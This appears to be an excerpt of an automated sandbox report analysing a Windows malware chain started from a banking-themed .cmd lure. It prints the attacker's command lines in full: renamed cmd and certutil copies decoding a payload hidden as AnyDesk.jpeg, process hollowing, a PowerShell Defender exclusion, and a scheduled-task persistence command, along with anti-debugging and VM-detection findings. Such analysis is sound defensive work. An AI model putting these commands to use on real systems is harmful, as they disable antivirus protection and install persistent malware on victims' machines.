                      Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,9_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,9_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,9_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,9_2_00007FF706EB1560
                      Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF706EB1560
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,12_2_00007FF627ABC6F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,12_2_00007FF627B2234C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B23100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,12_2_00007FF627B23100
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B210C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,12_2_00007FF627B210C4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B26F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,12_2_00007FF627B26F80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B03674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,12_2_00007FF627B03674
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A8D440
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,12_2_00007FF627ACD4A4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,12_2_00007FF627ACB3D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,12_2_00007FF627AC5E58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,12_2_00007FF627ACDBC0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B21B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,12_2_00007FF627B21B04
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B219F8 #359,FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF627B219F8
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,15_2_02DF5908
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,16_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,16_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,16_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00007FF706EB1560
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,17_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,17_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,17_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,17_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00007FF706EB1560
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,12_2_00007FF627B0511C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99870
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99720
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99570
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99435
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99219
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98582
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98438
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98304
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98168
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98045
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97927
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97781
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97664
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97532
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97406
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97182
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97026
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96812
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96656
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96343
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99745
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99602
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99377
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99201
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99020
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98882
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98763
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98611
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98203
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97675
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97541
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97334
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97127
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96946
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96835
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96705
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96577
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96462
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96340
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96227
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199861
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199737
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199475
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198803
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198580
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198358
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198228
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198114
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197990
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197862
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197676
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197542
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197409
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                      Source: Trading_AIBot.exe, 0000001C.00000002.1925787227.0000000000676000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.000000000072E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1438483669.0000000000776000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2158884710.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2601733139.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1976473773.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1945026422.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1926425166.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2066404539.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1570665204.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2476312068.0000000000589000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information queried: ProcessInformation

                      Anti Debugging

                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,15_2_02E0F744
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706ED63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,9_2_00007FF706ED63FC
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0894C LoadLibraryW,GetProcAddress,FreeLibrary,15_2_02E0894C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC4A14 GetEnvironmentStringsW,GetProcessHeap,HeapAlloc,memmove,FreeEnvironmentStringsW,9_2_00007FF706EC4A14
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC93B0 SetUnhandledExceptionFilter,9_2_00007FF706EC93B0
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF706EC8FA4
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC93B0 SetUnhandledExceptionFilter,11_2_00007FF706EC93B0
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF706EC8FA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B54E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF627B54E18
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B553E0 SetUnhandledExceptionFilter,12_2_00007FF627B553E0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC93B0 SetUnhandledExceptionFilter,16_2_00007FF706EC93B0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF706EC8FA4
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC93B0 SetUnhandledExceptionFilter,17_2_00007FF706EC93B0
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF706EC8FA4
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exe
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exe
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pif
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 28A008
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 28B008
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 332008
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B07024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,12_2_00007FF627B07024
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: unknown unknown
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: unknown unknown
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: unknown unknown
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF4AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,12_2_00007FF627AF4AF4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B04E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,12_2_00007FF627B04E98
                      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,9_2_00007FF706EC51EC
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,9_2_00007FF706EC3140
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,9_2_00007FF706EB6EE4
                      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF706EC51EC
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF706EC3140
